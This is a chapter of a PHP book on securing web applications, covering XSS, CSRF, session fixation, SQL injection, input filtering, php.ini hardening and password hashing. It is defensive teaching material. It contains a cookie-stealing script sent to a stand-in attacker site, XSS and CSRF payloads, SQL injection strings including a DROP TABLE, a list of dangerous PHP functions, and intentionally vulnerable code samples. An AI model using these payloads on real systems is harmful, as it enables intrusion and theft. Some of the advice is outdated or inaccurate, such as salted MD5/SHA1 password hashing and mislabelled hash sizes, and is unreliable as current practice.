C H A P T E R  11

Security

When programming web pages, it is very important to think about security. There are a lot of potential site vulnerabilities that an attacker will try to exploit. A good PHP developer needs to remain both diligent and current with security practices. In this chapter, we will cover some best practices and techniques to harden our sites.

A key idea of this chapter is to never trust data or the intentions of the user. User data that we need to filter and escape can come from multiple sources, such as URL query strings, form data, $_COOKIES, $_SESSION, $_SERVER arrays, and Ajax requests.

We will also go over common attacks and their prevention, covering the following topics:

  • Cross Site Scripting (XSS) prevention by escaping output
  • Cross Site Request Forgery (CSRF) prevention by using hidden form tokens
  • Session fixation prevention by not storing the session ID (SID) in a cookie and regenerating the SID at the start of every page
  • SQL injection prevention using prepared statements and PDO
  • Using the filter extension

We will also discuss how to solidify our php.ini and server settings and cover password-hashing strength.

Never Trust Data

In the television series the X-Files, Fox Mulder famously said, “Trust no one.” When it comes to web programming, we should follow this advice. Assume the worst-case scenario: that all data has been tainted. Cookies, Ajax requests, headers, and form values (even using POST) can all be spoofed or tampered with. Even if users could be completely trusted, we would still want to ensure that form fields are filled out properly and that we prevent malformed data. Therefore, we should filter all input and escape all output. Later in this chapter, we will look at some of the new PHP filter functions that make this process easier.

We will also discuss configuring php.ini for increased security. However, if we write a library of code for use by the general public, then we can not ensure that the end developer has followed best practices in their php.ini file. For this reason, we should always code defensively, and assume that the php.ini file has not been tightened up.

register_globals

A best practice is to always initialize variables. This is a safeguard against attacks that are made possible when the register_globals directive is turned on in php.ini. With register_globals enabled, $_POST and $_GET variables are registered as global variables within a script. If you append a query string such as "?foobar=3" to a script, PHP creates a global variable with the same name behind the scenes:

$foobar = 3; //register_globals declares this global variable for you.

With register_globals enabled and the URL set to http://foobar.com/login.php?is_admin=true, the script in Listing 11-1 will always be granted admin privileges.

Listing 11-1. register_globals Bypassing a Security Check: login.php

<?php
        session_start();

        //$is_admin = $_GET['is_admin']  initialized by register globals
        //$is_admin = true; current value passed in

        if ( user_is_admin( $_SESSION['user'] ) ) {     //makes this check useless
                    $is_admin = true;
        }

        if ( $is_admin ) {          //will always be true
                    //give the user admin privileges
        }
        …
?>

The attacker would have to guess the correct name of the $is_admin variable for the attack to work. Alternatively, if a known library is being used, an attacker can easily find variable names by studying the API or full source code of the library. The key to preventing this type of hack is to initialize all variables, as in Listing 11-2. This ensures that register_globals cannot override existing variables.

Listing 11-2. Initiating Variables to Safeguard Against register_globals Misuse

<?php
        //$is_admin = $_GET['is_admin']  initialized by register globals
        //$is_admin = true; current value passed in
        $is_admin = false;            //defensively set to override
                                      //initial value set by register globals
        if ( user_is_admin( $user ) ) {
                    $is_admin = true;
        }

        if ( $is_admin ) {   //this will only be true now
                            //if the user_is_admin function returns true
                    //give the user admin privileges
        }
        …
?>

Whitelists and Blacklists

We should not use $_GET or $_POST values for include or require function calls. This is because the filenames will be unknown to us. An attacker could attempt to bypass the document root restrictions by prefixing the filename with a string like "../../". For variables inside of include and require calls, we should have a whitelist of acceptable filenames or sanitize the filenames.

images Note A whitelist is a list of approved items. Conversely, a blacklist is a list of disallowed items. Whitelists are more rigid than blacklists, because they specify exactly what is approved. Blacklists need constant updating to be effective.

Examples of whitelists are acceptable e-mail addresses, domain names, or HTML tags. Examples of blacklists are disallowed e-mail addresses, domain names, or HTML tags.

Listing 11-3 demonstrates how to accept a whitelist of acceptable filenames.

Listing 11-3. Limiting Include Files by Using a Whitelist of Acceptable Filenames

<?php
        //whitelist of allowed include filenames
        $allowed_includes = array( 'fish.php', 'dogs.php', 'cat.php' );
        if ( isset( $_GET['animal']) ) {
                $animal = $_GET['animal'];
                $animal_file = $animal. '.php';
                if( in_array( $animal_file, $allowed_includes ) ) {
                        require_once($animal_file);
                } else {
                        echo "Error: illegal animal file";
                }
        }
?>

For files that our script opens, the basename function can help to ensure that the files included do not get outside of our document root.

For external URLs supplied by the user and retrieved with file_get_contents, we need to filter the filename. We can use the parse_url function to extract the URL and drop the query string, or use FILTER_SANITIZE_URL and FILTER_VALIDATE_URL to ensure a legal URL. We will discuss using filters later in the chapter.

Form Data

Most readers are aware that form fields submitted with the HTTP GET method can be altered by modifying the URL query directly. This is usually the desired behavior. For example, the search form of http://stackoverflow.com can be submitted using the query alone. See Listing 11-4.

Listing 11-4. Searching stackoverflow.com by Modifying the URL Query Directly

http://stackoverflow.com/search?q=php+xss

The actual markup of the search form is shown in Listing 11-5.

Listing 11-5. The stackoverflow.com Search Form

<form id="search" method="get" action="/search">
<div>
<input class="textbox" type="text" value="search" size="28" maxlength="140"·
 onfocus="if (this.value=='search') this.value = ''" tabindex="1" name="q">
</div>
</form>

The same search results can be obtained via a telnet client using HTTP requests directly, as shown in Listing 11-6.

Listing 11-6. Telnet Commands to Send a GET Request

telnet stackoverflow.com 80
GET /search?q=php+xss HTTP/1.1
Host: stackoverflow.com

A common misconception is that forms using the HTTP POST method are more secure. Though not directly modifiable through the URL query anymore, a user could still directly submit a query through telnet. If the previous form used the POST method, <form id="search" method="post" action="/search">, we could still send a query request directly using a modification of our previous telnet commands.

Listing 11-7. Telnet Commands to Send a POST Request

telnet stackoverflow.com 80
POST /search HTTP/1.1
Host: stackoverflow.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
q=php+xss

As you can see in Listing 11-7, the actual form markup is unnecessary. If we know the structure of the POST variables expected, we can send them along in a POST request. If an attacker is listening in on network traffic, they can easily see the form content being communicated back and forth. They can then attempt to spoof the form by repopulating it with valid values and submitting it. One way to eliminate form spoofing is to check that a hidden form token has been sent by the server along with the request. This will be covered later in this chapter, in the section “Cross-Site Request Forgery (CSRF).”

images Note The hidden form token is known as a nonce, which is an abbreviation of number used once. The token is different with each form submission, in order to prevent an unauthorized eavesdropper to resend valid data, such as a password. Without the hidden token, the server will reject the form submission data.

When the form data contains very sensitive information, such as a username and password for a bank, then communication should be done using a Secure Sockets Layer (SSL). SSL prevents eavesdroppers from listening in on network traffic.

$_COOKIES, $_SESSION, and $_SERVER

We cannot trust data in $_COOKIES to contain legitimate values, because the cookie data is stored on the client side and can be easily modified. Cookies are also vulnerable to cross-site scripting attacks, which we will discuss later in the chapter. For these reasons, we should use server-side $_SESSION data for any sensitive data. Although much more secure than cookies, sessions are susceptible to session fixation attacks. We will discuss prevention of session fixation later in the chapter as well. Even the $_SERVER variables should not be completely trusted. $_SERVER variables are generated by the server and not PHP. The variables that start with HTTP_ are from HTTP headers and can be easily spoofed.

Ajax Requests

In Ajax, which is discussed in depth in Chapter 15, an XMLHttpRequest object commonly sends an X-Requested-With header, like so:

<script type='text/javascript'>
        …
        xmlHttpRequest.setRequestHeader("X-Requested-With", "XMLHttpRequest");
        …
</script>

In a PHP script, a common technique to ensure that a request came from Ajax is to check for this header with:

<?php
        …
        if (  strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest' ) {
                //then it was an ajax request
        }
        …
?>

The header can be spoofed, however, so this does not guarantee that an Ajax request was sent.

Common Attacks

In this section we will discuss the two most prevalent attacks, XSS and CSRF, and show how to prevent them.

Same Origin Policy

As a prerequisite to learning about common attacks, we need to discuss the same origin policy. The same origin policy is a security implementation by browsers for client-side scripts, like JavaScript. It enables a script to access functions and elements only on the same protocol, host, and port. If any one of these differs, then the script is prevented from accessing the external script. Some attacks occur because the same origin policy is illegitimately circumvented to exploit a user or website.

images Note Unfortunately, the same origin policy prevents some legitimate uses. For instance, all of the following would be illegal:

Different protocol
http://www.foobar.com
https://www.foobar.com

Different port
http://www.foobar.com:80
http://www.foobar.com:81

Different subdomain
http://www.foobar.com
http://foobar.com
http://sub.foobar.com

In HTML 5, the postMessage function will enable legitimate situations like these. At the moment, there is limited browser support for this function.

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) is an attack where a client-side script, like JavaScript, Jscript, or VBScript, is injected into a web page. XSS works by bypassing the same origin policy and can only occur when you are outputting data into the browser. For this reason, it is very important to escape all outputted user data.

images Note Escaping output refers to removing or substituting potentially dangerous output. Depending on the context, this can include prepending escape characters to quotes (" becomes "), replacing < and > signs with their HTML entities, &lt; and &gt, and removing <script> tags.

XSS attacks exploit a user's trust in a site. An XSS attack commonly steals cookies. The implanted script reads document.cookie from the trusted site and then sends the data to the malicious site. With XSS, client side scripts are the enemy. As soon as an attacker finds a way to inject an unescaped client side script onto the outputted page, they have won the proverbial battle.

What XSS Attacks Look Like

Any place that a user can input JavaScript (or another script) without it being filtered and escaped when redisplayed is vulnerable to XSS. This commonly occurs in the following:

  • Comments or guest books.

Listing 11-8. An Unescaped User Comment That Opens an Alert Box When Anyone Visits the Page

<script type="text/javascript">alert('XSS attack'),</script>

or

Listing 11-9. An Unescaped Comment That Reads a Visitor's Cookies and Transfers Them to an Attacker's Site

<script type="text/javascript">
document.location = 'http://attackingSite.com/cookieGrabber.php?cookies='
                                 + document.cookie
</script>
  • PHP forms that are not filtered and escaped when redisplayed. This could be in a log-in, sign-up, or search form.

Consider a form that populates field values using $_POST data. When the form is submitted incompletely, then the previous values fill the input fields. This is a common technique used to maintain state with forms. It enables a user to not have to reenter each field value if they input an illegal value or miss a required field. Consider the PHP script shown in Listing 11-10.

Listing 11-10. Sticky Form Handling with PHP. No Output Escaping, So Susceptible to XSS

<?php

$field_1 = "";
$field_2 = "";
if ( isset( $_POST['submit'] ) ) {
    $form_fields = array( 'field_1', 'field_2' );
    $completed_form = true;
    foreach ( $form_fields as $field ) {
        if ( !isset( $_POST[$field] ) || trim( $_POST[$field] ) == "" ) {
            $completed_form = false;
            break;
        }else{
            ${$field} = $_POST[$field];
        }
    }

    if ( $completed_form ) {
        //do something with values and redirect
        header( "Location: success.php" );
    } else {
        print "<h2>error</h2>";
    }
}
?>
<form action="listing_11_10.php" method="post">
    <input type="text" name="field_1" value="<?php print $field_1; ?>" />
    <input type="text" name="field_2" value="<?php print $field_2; ?>" />
    <input type="submit" name="submit" />
</form>

If we input into field_1 the value:

"><script type="text/javascript">alert('XSS attack'),</script><"

and nothing into field_2, then our submitted form will fail our validation check. The form will redisplay with our unescaped sticky values. The generated markup will now look like Listing 11-11.

Listing 11-11. The Interpolated Markup with XSS Expoit

<form action="index.php" method="post">
    <input type="text" name="field_1" value=""><script type="text/javascript">alertimages
('XSS   attack'),</script><"" />
    <input type="text" name="field_2" value="" />
    <input type="submit" name="submit" />
</form>

The attacker has been able to insert JavaScript onto the page. We can prevent this by escaping the variables that we will output:

${$field} = htmlspecialchars( $_POST[$field], ENT_QUOTES, "UTF-8" );

This gets rid of the threat, producing the harmless markup shown in Listing 11-12.

Listing 11-12. Interpolated Markup Made Harmless by Escaping Output with htmlspecialchars

<form action="index.php" method="post">
    <input type="text" name="field_1" value="&quot;&gt;&lt;script type=&quot;images
text/javascript&quot;&gt;alert(&#039;XSS attack&#039;);&lt;/script&gt;&lt;&quot;" />
    <input type="text" name="field_2" value="" />
    <input type="submit" name="submit" />
</form>
  • URL query string variables can easily be abused if not filtered and escaped on output. Consider this URL with query string:
http://www.foobar.com?user=<script type="text/javascript">alert('XSS attack'),</script>

and the PHP code

<?php
echo "Information for user: ".$_GET['user'];
?>
Preventing XSS Attacks

To prevent XSS, we need to escape any output data that the user could inject malicious code into. This includes form values, $_GET query variables, and guestbook and comment posts that could contain HTML markup.

To escape HTML from an output string, $our_string, we can use the function

htmlspecialchars( $our_string, ENT_QUOTES, 'UTF-8' )

We can also use filter_var( $our_string, FILTER_SANITIZE_STRING ). We will discuss the filter_var functions in more detail later in the chapter. To prevent XSS while allowing more freedom in outputted data, the PHP library HTML Purifier is one of the most popular methods. HTML Purifier can be found at http://htmlpurifier.org/.

Cross-Site Request Forgery (CSRF)

CSRF is the opposite of XSS in that it exploits a site's trust in a user. CSRF involves a forged HTTP request and commonly occurs within an img tag.

An Example CSRF Attack

Imagine that a user visits a website containing the following markup:

<img src="http://attackedbank.com/transfer.php?from_user=victim&amount=1000&to_user=attacker"/>

The URL in the src attribute is visited by the browser with the intention of fetching an image. Instead, a PHP page with query string is visited. If the user has been to attackedbank.com recently and still has cookie data for the site, then the request could go through. More complicated attacks spoof the POST method using direct HTTP requests. The difficulty in a CSRF for an attacked website is the inability to differentiate valid from invalid requests.

CSRF Prevention

The most common technique used to prevent CSRF is to generate and store a secret session token when the session ID is generated, as shown in Listing 11-13. Then the secret token is included as a hidden form field. When the form is submitted, we ensure that the token is present and matches the value found in our session. We also ensure that the form was submitted within a specified time period.

Listing 11-13. A Sample Form with Hidden Token

<?php

session_start();
session_regenerate_id();
if ( !isset( $_SESSION['csrf_token'] ) ) {
  $csrf_token = sha1( uniqid( rand(), true ) );
  $_SESSION['csrf_token'] = $csrf_token;
  $_SESSION['csrf_token_time'] = time();
}
?>

<form>
<input type="hidden" name="csrf_token" value="<?php echo $csrf_token; ?>" />

</form>

We then validate that the secret token value matches and the generation time is within a specified range (see Listing 11-14).

Listing 11-14. Validating That the Secret Token Value Matches

<?php

session_start();
if ( $_POST['csrf_token'] == $_SESSION['csrf_token'] ) {
  $csrf_token_age = time() - $_SESSION['csrf_token_time'];
    
  if ( $csrf_token_age <= 180 ) { //three minutes
       //valid, process request
  }
}
?>

Sessions

Session fixation occurs when one person sets another person's session identifier (SID). A common way to do this is using XSS to write a SID to a user's cookies. Session IDs might be retrieved in the URL (e.g., /index.php?PHPSESSID=1234abcd) or can be listened for in the network traffic by an attacker.

To safeguard against session fixation, we can regenerate the session at the start of every script and set directives in our php.ini.

In our PHP files, we can replace the session ID with a new one, but keep the current session data. See Listing 11-15.

Listing 11-15. Replacing the Session ID at the Start of Every Script

<?php

session_start();
session_regenerate_id();

In our php.ini file, we can disable using cookies to store the SID. We also prevent the SID from appearing in the URL.

session.use_cookies = 1
session.use_only_cookies = 1
session.use_trans_sid = 0

images Note The session.gc_maxlifetime directive relies on garbage collection. For more consistency, keep track of the session start time yourself and expire it after a specified time period.

To prevent session fixation, we can also store the values of some $_SERVER information, namely REMOTE_ADDR, HTTP_USER_AGENT and HTTP_REFERER. We then recheck these fields at the start of every script execution and compare the values for consistency. If the stored and actual values differ and we suspect tampering of the session, we can destroy it with session_destroy();.

One final safeguard is to encrypt session data server-side. This makes compromised session data worthless to anyone without the decryption key.

Preventing SQL Injection

SQL injection can occur when input data is not escaped before being inserted into a database query. Whether malicious or not, SQL injection affects a database in ways that the query was not intended to. A classic example of SQL injection is on the query string:

$sql = "SELECT * FROM BankAccount WHERE username = '{$_POST['user'] }'";

If an attacker can correctly guess or determine (through displayed error or debugging output) database table field name(s) corresponding to form input(s), then injection is possible. For instance, setting the form field "user" to "foobar' OR username = 'foobar2", without escaping the data on submit, has the result of being interpolated as:

$sql = "SELECT * FROM BankAccount WHERE username = 'foobar' OR username = 'foobar2'";

This allows the attacker to view information from two different accounts.

An even bigger injection would be the input string "foobar' OR username = username"

which would be interpolated as

$sql = "SELECT * FROM BankAccount WHERE username ='foobar' OR username = username";

Because "username = username" is always true, the entire WHERE clause will always evaluate to true. The query will return all of the records from the BankAccount table.

Still, other injections could alter or delete data. Consider the query:

$sql = "SELECT * FROM BankAccount WHERE id = $_POST['id'] ";

and a $_POST value of:

$_POST['id']= "1; DROP TABLE `BankAccount`;"

Without escaping the variable, this is interpolated as:

"SELECT * FROM BankAccount WHERE id = 1; DROP TABLE `BankAccount`;"

which will drop the BankAccount table.

If you can, you should use placeholders, such as those found in PHP Data Objects (PHP). From a security perspective, PDO allows placeholders, prepared statements, and binding data. Consider the three variations of a query with PDO shown in Listing 11-16.

Listing 11-16. Three Different Ways to Execute the Same Query in PDO

<?php
//No placeholders. Susceptible to SQL injection
$stmt = $pdo_dbh->query( "SELECT * FROM BankAccount WHERE username = '{$_POST['username']}' " );  

//Unnamed placeholders.  
$stmt = $pdo_dbh->prepare( "SELECT * FROM BankAccount WHERE username = ? " );  
$stmt->execute( array( $_POST['username'] ) );

//Named placeholders.
$stmt = $pdo_dbh->prepare( "SELECT * FROM BankAccount WHERE username = :user " );  
$stmt->bindParam(':user', $_POST['username']);
$stmt->execute( );

PDO also provides the quote function:

$safer_query = $pdo_dbh->quote($raw_unsafe_query);  

If you are not using PDO, then there are alternatives to the quote function. For MySQL databases, use the mysql_real_escape_string function. For PostgreSQL databases, use the pg_escape_string and pg_escape_bytea functions. To use either the MySQL or PostgreSQL escape functions, you need to have the appropriate library enabled in php.ini. If mysql_real_escape_string is not an available option, use the addslashes function. Keep in mind that mysql_real_escape_string handles character encoding issues and binary data better than addslashes, and is generally safer.

The Filter Extension

The filter extension was added in PHP 5.2. The filter extension and filter_var function were touched upon in Chapter 6 - Form Design, but we will go into more depth in this chapter, showing optional FILTER_FLAGS. The filters found in the extension are either for validation or sanitization. Validation filters return the input string if it is valid or false if it is not. Sanitization filters remove illegal characters and returns the modified string.

The filter extension has two php.ini directives filter.default and filter.default_flags which default to:

filter.default = unsafe_raw
filter.default_flags = NULL

This directive will filter all the superglobal variables $_GET, $_POST, $_COOKIE, $_SERVER, and $_REQUEST. The unsafe_raw sanitization filter does nothing by default. However you can set the following flags:

FILTER_FLAG_STRIP_LOW   //strip ASCII values smaller than 32 (non printable characters)
FILTER_FLAG_STRIP_HIGH  //strip ASCII values larger than 127 (extended ASCII)
FILTER_FLAG_ENCODE_LOW  //encode values smaller than 32
FILTER_FLAG_ENCODE_HIGH //encode values larger than 127
FILTER_FLAG_ENCODE_AMP  //encode & as &amp;

The validation filters are FILTER_VALIDATE_type where type is one of {BOOLEAN, EMAIL, FLOAT, INT, IP, REGEXP and URL}.

We can make the validation filters more restrictive by passing FILTER_FLAGS into the third parameter. A list of all validation filters cross referenced with optional flags is available at www.php.net/manual/en/filter.filters.validate.php, and flags cross-referenced with filter are at available at www.php.net/manual/en/filter.filters.flags.php.

When using FILTER_VALIDATE_IP, there are four optional flags:

FILTER_FLAG_IPV4                //only IPv4 accepted, ex 192.0.2.128
FILTER_FLAG_IPV6                //only IPv6 accepted, ex ::ffff:192.0.2.128
                                //2001:0db8:85a3:0000:0000:8a2e:0370:7334.
FILTER_FLAG_NO_PRIV_RANGE       //private ranges fail
                                //IPv4: 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 and
                                //IPv6 starting with FD or FC
FILTER_FLAG_NO_RES_RANGE        //reserved ranges fail
                                //IPv4: 0.0.0.0/8, 169.254.0.0/16,
                                //192.0.2.0/24 an d 224.0.0.0/4.
                                //IPv6: does not apply

Listing 11-17. Using Filter Flags with FILTER_VALIDATE_IP

<?php
$ip_address = "192.0.2.128"; //IPv4 address
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 ) );
//192.0.2.128
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
//false

$ip_address = "::ffff:192.0.2.128"; //IPv6 address representation of 192.0.2.128
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 ) );
//false
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
//ffff:192.0.2.128


$ip_address = "2001:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var($ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
// 2001:0db8:85a3:0000:0000:8a2e:0370:7334

$ip_address = "2001:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE ) );
//2001:0db8:85a3:0000:0000:8a2e:0370:7334

$ip_address = "FD01:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE ) );
//false

$ip_address = "192.0.3.1";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_RES_RANGE ) );
//192.0.3.1

$ip_address = "192.0.2.1";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_RES_RANGE ) );
//false
?>

For FILTER_VALIDATE_URL there are only two optional flags, which are:

FILTER_FLAG_PATH_REQUIRED              //http://www.foobar.com/path
FILTER_FLAG_QUERY_REQUIRED             //http://www.foobar.com/path?query=something

<?php
$url_address = "http://www.brian.com";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//"http://www.brian.com/index"

$url_address = "http://www.brian.com/index?q=hey";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//http://www.brian.com/index?q=hey

$url_address = "http://www.brian.com";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index?q=hey";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//http://www.brian.com/index?q=hey
?>  

The sanitization filters are FILTER_SANITIZE_type where type is one of {EMAIL, ENCODED, MAGIC_QUOTES, FLOAT, INT, SPECIAL_CHARS, STRING, STRIPPED, URL, UNSAFE_RAW}. Of these filters, FILTER_SANITIZE_STRING removes HTML tags, and FILTER_SANITIZE_STRIPPED is an alias of FILTER_SANITIZE_STRING.

There is also FILTER_CALLBACK which is a user defined filtering function.

Sanitize functions modify the original variable, but do not validate it. Usually we would want to run a variable through a sanitizing filter and then a verifying filter. Here is an example usage with the EMAIL filter:

Listing 11-18. FILTER_SANITIZE_EMAIL Example

<?php

$email = '([email protected])';
//get rid of the illegal parenthesis characters
$sanitized_email = filter_var( $email, FILTER_SANITIZE_EMAIL );
var_dump( $sanitized_email );
//[email protected]

var_dump( filter_var( $email, FILTER_VALIDATE_EMAIL ) );
//false

var_dump( filter_var( $sanitized_email, FILTER_VALIDATE_EMAIL ) );
//[email protected]
?>

The function filter_var_array is similar to filter_var but can filter multiple variables at a time. For filtering superglobals, you would use one the following three functions:

  • filter_has_var($type, $variable_name) where type is one of INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER, or INPUT_ENV and correspond to the respective superglobal array. Returns whether the variable exists.
  • filter_input, which retrieves a specific external variable by name and optionally filters it.
  • filter_input_array, which retrieves external variables and optionally filters them.

Listing 11-19. filter_has_var Example

<?php
// http://localhost/filter_has_var_test.php?test2=hey&test3=

$_GET['test'] = 1;
var_dump( filter_has_var( INPUT_GET, 'test' ) );
//false
var_dump( filter_has_var( INPUT_GET, 'test2' ) );
//true
var_dump( filter_has_var( INPUT_GET, 'test3' ) );
//true
?>

images Note The filter_has_var function returns false unless the $_GET variable was changed in the actual query string. It also returns true when the value of the variable is empty.

For filter meta information, use the following two functions:

  • filter_list, which returns a list of supported filters
  • filter_id, which returns the ID of a filter

php.ini and Server Settings

Central to a hardened environment is having a properly configured php.ini file and a secure server/host. If the server is compromised, then any additional security measures we place are in vain. As an example, it is no use filtering data and escaping output in a PHP file if that file becomes writeable to an attacker.

Server Environment

The less a potential attacker knows about our server environment the better. This includes physical server information, whether our site has shared hosting, which modules we are running, and php.ini and file settings. Known security improvements in a new version of Apache, PHP, or a third-party library mean that an attacker will know exactly what can be exposed in an older version. For this reason, we do not want to be able to show phpinfo() on a production environment. We will later look at how to disable it in php.ini.

On Apache servers, we can use .htaccess to restrict the access and visibility of files. We can also add index files to directories so that directory contents are not listed. It is also important to not allow files to be writeable by the web user unless absolutely necessary. We want to write protect directories and files. Setting directory permissions to 755 and file permissions to 644 limits non-file owners to read access and non-directory owners to read and execute access.

We also cannot depend on a robots.txt file to block web crawlers from reading sensitive data on our site. In fact, it may help direct a malicious crawler straight toward it. For this reason, all sensitive data should be outside of the document root.

If we are in a shared hosting environment, we need to be able to trust that our host uses best practices for security and quickly patch any new vulnerability. Otherwise, exploits on other sites on the server could allow access to our site's files. We will discuss using PHP safe_mode in the next section. Finally, we should go over the server and PHP logs periodically to look for suspicious or erroneous behavior.

Hardening PHP.INI

There are several directives in a php.ini file that should be adjusted for optimum security, which we will go over now.

We want to ensure that in a production environment any potential errors are not output to the screen display, possibly exposing some internal details of our filesystem or script. We still want to be aware of the errors, but not display them.

display_errors =  Off                   //do not display errors
display_startup_errors  =  Off
log_errors = On                         //log errors

This extra effort goes to waste if the log files can be found and read. So make sure that the log is written outside of the document root.

error_log = "/somewhere/outside/web/root/"
track_errors = Off      //keeps track of last error inside global $php_errormsg. We do notimages
 want this.
html_errors = Off       //inserts links to documentation about errors
expose_php = Off;       //does not let the server add PHP to its header,
                        //thus letting on that PHP is used on the server

As previously discussed, register_globals can be a big security hole especially if variables are not initialized.

register_globals = Off           //would register form data as global variables
                                 // DEPRECATED as of PHP 5.3.0

Magic quotes attempts to automatically escape quotes. However, this leads to inconsistencies. It is best to use database functions for this explicitly.

magic_quotes_gpc = Off   //deprecated in 5.3.0  Use database escaping instead

As previously mentioned, we should disable setting the SID in cookies or the URL.

session.use_cookies = 1
session.use_only_cookies = 1
session.use_trans_sid = 0

We can disable higher risk PHP functions, enabling some if need be.

disable_functions =  curl_exec, curl_multi_exec, exec, highlight_file, parse_ini_file,images
passthru, phpinfo, proc_open, popen, shell_exec, show_source, system

There is the equivalent directive for PHP classes, where we can disable any that we do not want PHP to be able to use.

disable_classes =

We can harden how PHP handles file access and remote files:

allow_url_fopen = Off           //whether to allow remote files to be opened
allow_url_include = Off         //whether to allow includes to come from remote files
file_uploads = Off              //disable only if your scripts do not need file uploads

The directive open_basedir limits the files that can be opened by PHP to the specified directory and subtree.

open_basedir = /the/base/directory/
enable_dl = Off                         //can allow bypassing of open_basedir settings

For shared hosting, safe_mode restricts PHP to be executed by the appropriate user id only. However, it does not restrict other scripting languages such as Bash or Perl from doing the same. This limits the actual amount of safety we can expect from this directive.

safe_mode = On

Password Algorithms

In this section, we will look at the strength of password hashes. When storing user passwords, we want to use a format that makes it hard for attackers to discover the password even if they hack into our database. For this reason, we never want to store a password as plain text. Hashing functions take an input string and convert it into a fixed length representation.

Hashes are a one way algorithm, meaning that you cannot get the input string from the hash. You have to always rehash the input and compare the result to a known, stored hash. The crc32 hash function always represents data as 32-bit binary numbers. Because there are more strings than representations, hash functions are not one to one. There will be unique strings that generate the same hash. The Message Digest Algorithm (MD5) converts an input string into a 32-character hexadecimal number or to the equivalent 128-bit binary number.

Even though hashing is one way, computed results known as rainbow tables provide reverse lookups for some hashes. MD5 hashes have a known rainbow table. For this reason, if a database stores passwords in MD5 format and is compromised, then user passwords can be easily determined.

If you use MD5 hashes, we have to make them stronger by salting them. Salting involves appending a string to a hashed result and then rehashing the concatenated result. Only if we know what the additional salt is for a hash can we regenerate it from an input string.

In PHP, the function mt_rand is newer and has a faster algorithm then the rand function. To generate a random value between 1 and 100, you would call:

mt_rand(1, 100);

The function uniqid will generate a unique ID. It has two optional parameters, the first being a prefix and the second being whether to use more entropy (randomness). Using these functions, we can generate a unique salt. See Listing 11-20.

Listing 11-20. Generating a Unique Salt and Rehashing Our Password with It

<?php
  $salt = uniqid( mt_rand() );
  $password = md5( $user_input );
  $stronger_password = md5( $password.$salt );
?>

We would also need to store the value of $salt in a database for later retrieval and regeneration of the hash.

Stronger than the md5 hash is the US Secure Hash Algorithm 1 (SHA1) hash. PHP has the sha1() function:

$stronger_password = sha1( $password.$salt );

For PHP 5.1.2 and later, you can use the successor of sha1, sha2. As you would expect, sha2 is stronger than sha1. To use sha2, we need to use the more generic hash function, which takes a hash algorithm name as the first parameter and an input string as the second. There are over 30 hash algorithms currently available. The function hash_algos will return a list of all the available hashing algorithms on your version of PHP.

Listing 11-21. Using the Hash Function with the sha2 Algorithm

<?php
  $string = "your_password";
$sha2_32bit = hash( 'sha256', $string );  //32 bit sha2
$sha2_64bit = hash( 'sha512', $string );  //64 bit sha2

Alternately, the crypt function can be used with several algorithms such as md5, sha256, and sha512. However, it takes more rigid salt lengths and varying prefixes, depending on the algorithm used. As such, it is more difficult to remember the correct syntax to use.

Finally, when trying to build a login system for your site, existing solutions like OpenID or OAuth offer a guaranteed level of protection. Consider using something established and tested unless there is a need for a unique solution.

Summary

In this chapter we covered a lot of ground. We discussed the importance of security in PHP scripts. We talked about not trusting any data in our program and escaping output. We discussed using the filter extension and guarding against session fixation, XSS, and CSRF attacks. We also went over SQL injection and keeping our filesystem secure. Finally, we showed how to adjust the php.ini file for security and the strengths of password hashes.

When thinking about security, the main point to remember is that data and the user should not be trusted. While developing an application, we must assume that data could be compromised and that the user is looking for exploits, and take preventative safeguards.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset